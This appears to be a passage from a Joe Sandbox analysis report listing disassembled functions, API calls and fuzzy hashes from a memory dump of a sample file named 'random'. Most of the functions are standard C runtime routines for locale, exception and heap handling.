Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: ea0638559798fde9a7cf04c651c632bc600b1c5daa0bcef602a5c44ca33199bd
Instruction ID: b62c0d69541431b774c3614b55ab18430e1a3cd8f9d136f1a8897c06bbe00f82
Opcode Fuzzy Hash: ea0638559798fde9a7cf04c651c632bc600b1c5daa0bcef602a5c44ca33199bd
Instruction Fuzzy Hash: 1271E532900305ABDF219E948C45BAE7BBAAF4E314F1D6079F915BF241E775AC04C762

Function 00E954C5 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00E9550C
__alloca_probe_16.LIBCMT ref: 00E95538
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00E95577
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E95594
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E955D3
__alloca_probe_16.LIBCMT ref: 00E955F0
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00E95632
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E95655

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 43ceb2a6d8a1f164010e99a605fff9744941e6e0c75915023ed546a45486c89f
Instruction ID: de1260c9f5dca4955bcc0a49c201089de08a187626aaafbe2b3372af6944ce4e
Opcode Fuzzy Hash: 43ceb2a6d8a1f164010e99a605fff9744941e6e0c75915023ed546a45486c89f
Instruction Fuzzy Hash: 4F51CD73600606AFEF229F65CC45FBB7BA9EF40744F65552AF905B6192DB30CD108BA0

Function 00E961E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00E96217
___except_validate_context_record.LIBVCRUNTIME ref: 00E9621F
_ValidateLocalCookies.LIBCMT ref: 00E962A8
__IsNonwritableInCurrentImage.LIBCMT ref: 00E962D3
_ValidateLocalCookies.LIBCMT ref: 00E96328

Strings

csm, xrefs: 00E962BD

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3949ec2bdd15975fcc6d5c7d6969e3b69fe36250ad7e752d5bc8582b66b2ec5c
Instruction ID: ee6a18065cb46a89085d2b42bcfa0e5755b10b81244b69c2a3c870c5b7d7c8b4
Opcode Fuzzy Hash: 3949ec2bdd15975fcc6d5c7d6969e3b69fe36250ad7e752d5bc8582b66b2ec5c
Instruction Fuzzy Hash: 7241C830A00214EFCF11DF69C885A9E7BF5EF45318F149556E9187B362C731EA05CB90

Function 00E9F469 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00E9F578,00E9186A,?,00000000,00E931E1,00E9186C,?,00E9F1F6,00000022,FlsSetValue,00EADFE0,8,,00E931E1), ref: 00E9F52A

Strings

api-ms-, xrefs: 00E9F4C0
ext-ms-, xrefs: 00E9F4D4

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 386324e6f83d0a3d0598b95fc8beab81ad17c79748aedf5d909eb4a866f9b701
Instruction ID: bf29425834eac1f165d377a27e2900a4b1014afbae7a4f138e20208087d07c0d
Opcode Fuzzy Hash: 386324e6f83d0a3d0598b95fc8beab81ad17c79748aedf5d909eb4a866f9b701
Instruction Fuzzy Hash: DA21F372A01211AFCB228B65EC41A5B77589B41768B251230ED26F72A1EB30FE00C7D0

Function 00EA625D Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb7b518e059c1ba9ffd81d39b10cf90c754ea23349697fe9cb2e7b05bbc61c22
Instruction ID: 2ecaf721199c50cd7f5b89199b0ca40151973bc15e25bfda4233d38899854c45
Opcode Fuzzy Hash: cb7b518e059c1ba9ffd81d39b10cf90c754ea23349697fe9cb2e7b05bbc61c22
Instruction Fuzzy Hash: E7B1EE70E04244AFDF11DFA8D841BAE7BB1BF4F308F185668E511BB292C770A945CBA1

Function 00E9D2C0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00E9D2B7,00E95FB7,00E95179), ref: 00E9D2CE
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E9D2DC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E9D2F5
SetLastError.KERNEL32(00000000,00E9D2B7,00E95FB7,00E95179), ref: 00E9D347

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a3b0c8a4510130dd61da5488def6520a0f8434429badb6b93e0f37d491e02198
Instruction ID: 9efa90606e0f5df765f0ec6daa6a0f01152fdd87ab9abbf982833e3f33b5540c
Opcode Fuzzy Hash: a3b0c8a4510130dd61da5488def6520a0f8434429badb6b93e0f37d491e02198
Instruction Fuzzy Hash: 1F014C3310E7255EAF26A7B57CC596726C4EF42779320132AF120B51E0EF114C099281

Function 00E9DB88 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00E9DCA7
CallUnexpected.LIBVCRUNTIME ref: 00E9DF20

Strings

csm, xrefs: 00E9DCDE
csm, xrefs: 00E9DC32
csm, xrefs: 00E9DBC5

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 6c41419393b1f4bfcddc0356493c0aabe6b500238dbbfd88b74d080fa77cbeba
Instruction ID: 6e2bcab4e7180f491de4121c28ba0fbb2d67e39214570be711c3f9e0151675d3
Opcode Fuzzy Hash: 6c41419393b1f4bfcddc0356493c0aabe6b500238dbbfd88b74d080fa77cbeba
Instruction Fuzzy Hash: 31B19671C08229EFCF29DFA4CC819AEBBB5FF24304B14615AE8117B212D375EA51CB91

Function 00E98C55 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8040FA0D,?,?,00000000,00EAB774,000000FF,?,00E98D16,00E98BFD,?,00E98DB2,00000000), ref: 00E98C8A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E98C9C
FreeLibrary.KERNEL32(00000000,?,?,00000000,00EAB774,000000FF,?,00E98D16,00E98BFD,?,00E98DB2,00000000), ref: 00E98CBE

Strings

CorExitProcess, xrefs: 00E98C94
mscoree.dll, xrefs: 00E98C83

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 52594363fd98d09dd946df783e6dfc0d13e198d60e1e064d80a6d331ae440d6b
Instruction ID: 9c8239c6f1d5390ebc742d8f80835214afa0382491564be1716ad9d748b835e7
Opcode Fuzzy Hash: 52594363fd98d09dd946df783e6dfc0d13e198d60e1e064d80a6d331ae440d6b
Instruction Fuzzy Hash: 0E01A731941625EFCB118B65CD09BAFB7B8FB45B14F000625F811B22E0DBB4A904CA90

Function 00E9FC3D Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00E9FCC2
__alloca_probe_16.LIBCMT ref: 00E9FD8B
__freea.LIBCMT ref: 00E9FDF2

Part of subcall function 00E9E531: RtlAllocateHeap.NTDLL(00000000,00E931E1,00E9186A,?,00E960C1,00E9186C,00E9186A,?,?,?,00E93181,00E931E1,00E9186E,00E9186A,00E9186A,00E9186A), ref: 00E9E563

__freea.LIBCMT ref: 00E9FE05
__freea.LIBCMT ref: 00E9FE12

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: b9fb3bccc8b294c5a643c823264091e04d62ae2b25fce6bcece1b20ac9ac44b9
Instruction ID: 2a9b6faf475749ac5ae43ff75eff06d34bec0d77de9171ee62d82426c6e58b9c
Opcode Fuzzy Hash: b9fb3bccc8b294c5a643c823264091e04d62ae2b25fce6bcece1b20ac9ac44b9
Instruction Fuzzy Hash: CD51C6B2600206AFDF219F61CC81EBF76A9EF44724B295539FD04F7112EB30CC6086A0

Function 00E93010 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E93017
std::_Lockit::_Lockit.LIBCPMT ref: 00E93022
std::_Lockit::~_Lockit.LIBCPMT ref: 00E93090

Part of subcall function 00E92EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00E92EFC

std::locale::_Setgloballocale.LIBCPMT ref: 00E9303D
_Yarn.LIBCPMT ref: 00E93053

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 0acf714741ddf86c94fa597ca2a6f8173581aa50cd5f3eb2a9c8d790eabb2f3c
Instruction ID: 513ede24603fbaad4e1ccd76699f25f6e3dbcd16b455beb18c842266ed6cf045
Opcode Fuzzy Hash: 0acf714741ddf86c94fa597ca2a6f8173581aa50cd5f3eb2a9c8d790eabb2f3c
Instruction Fuzzy Hash: FD015AB6A01620AFCF16EF60988657E77A1FF84340B14550DE91277391CF346A06CB91

Function 00EA7E92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00EA7F2E,00000000,?,00EB6E10,?,?,?,00EA7E65,00000004,InitializeCriticalSectionEx,00EAE57C,00EAE584), ref: 00EA7E9F
GetLastError.KERNEL32(?,00EA7F2E,00000000,?,00EB6E10,?,?,?,00EA7E65,00000004,InitializeCriticalSectionEx,00EAE57C,00EAE584,00000000,?,00E9E1DC), ref: 00EA7EA9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00EA7ED1

Strings

api-ms-, xrefs: 00EA7EB6

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 3f8e4c4ac540ef23ae25341a0312d14fdb97e08dda851a04f05b6e4ed4d03ecf
Instruction ID: 8a7f0e50f966fd78c631ef518de5937be58f53dbc45b5264827e49e88acecd45
Opcode Fuzzy Hash: 3f8e4c4ac540ef23ae25341a0312d14fdb97e08dda851a04f05b6e4ed4d03ecf
Instruction Fuzzy Hash: 9EE09230284208BAEA205B71DC07B5B7A98DF05B55F105460F94DBC4E2E761BD5086C4

Function 00EA562D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(8040FA0D,00000000,00000000,?), ref: 00EA5690

Part of subcall function 00E9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00E9FDE8,?,00000000,-00000008), ref: 00E9E6A2

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EA58E2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EA5928
GetLastError.KERNEL32 ref: 00EA59CB

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 9848a1e42f0b607dae4945566ac2907f340ed37f56f540be333a91a668e2b47c
Instruction ID: 3400d2da2a0f57b846b6714c97df67734d51116493d92c766ed9079b3d6b5cb0
Opcode Fuzzy Hash: 9848a1e42f0b607dae4945566ac2907f340ed37f56f540be333a91a668e2b47c
Instruction Fuzzy Hash: ACD16976D00648DFCF15CFA8D8809AEBBB9EF4A314F28512AE466FB351D630A945CB50

Function 00E9D8AF Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00E9D976
___AdjustPointer.LIBCMT ref: 00E9D999
___AdjustPointer.LIBCMT ref: 00E9DA35

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: fa4d5adf17e878365e03ec024a47c8d179adf307332318bd2705f08a79674d85
Instruction ID: a4193c4969bd942f18ac08773448e4ab056987359c2c56b8b7c91b90468e5c4d
Opcode Fuzzy Hash: fa4d5adf17e878365e03ec024a47c8d179adf307332318bd2705f08a79674d85
Instruction Fuzzy Hash: FA51E27660D625AFDF29AF50DC45BBA73A4EF80314F145029E845BB291D771ED40CB50

Function 00EA3537 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00E9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00E9FDE8,?,00000000,-00000008), ref: 00E9E6A2

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00EA359B
__dosmaperr.LIBCMT ref: 00EA35A2
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00EA35DC
__dosmaperr.LIBCMT ref: 00EA35E3

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 14ca46d9d01441d2a15b2c3a53cc8df5d596fb5329fd7dbc5e179b13b9e7409e
Instruction ID: 4198d39606ab5f1a53362471d71f8781f988e62704f2eae603f1d5b054d11cbb
Opcode Fuzzy Hash: 14ca46d9d01441d2a15b2c3a53cc8df5d596fb5329fd7dbc5e179b13b9e7409e
Instruction Fuzzy Hash: 8621DA71A00605AFDF209F79984186BBBE8FF493687145529F825BB641D730FF4087D1

Function 00E98042 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 471b84598747a7ad2a38236b0f2edcddca303ecda4389bf7b0012e528c5dabc6
Instruction ID: bcba708fc87d3b950a1e1e1c0d307037d52948fb992e0c4ffca28dacc5c98bcf
Opcode Fuzzy Hash: 471b84598747a7ad2a38236b0f2edcddca303ecda4389bf7b0012e528c5dabc6
Instruction Fuzzy Hash: 7F21C071200205AFEF20AF71CD8196B77A9FF423687146529F869F7261EF31EC4487A1

Function 00EA484F Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00EA4857

Part of subcall function 00E9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00E9FDE8,?,00000000,-00000008), ref: 00E9E6A2

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA488F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA48AF

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
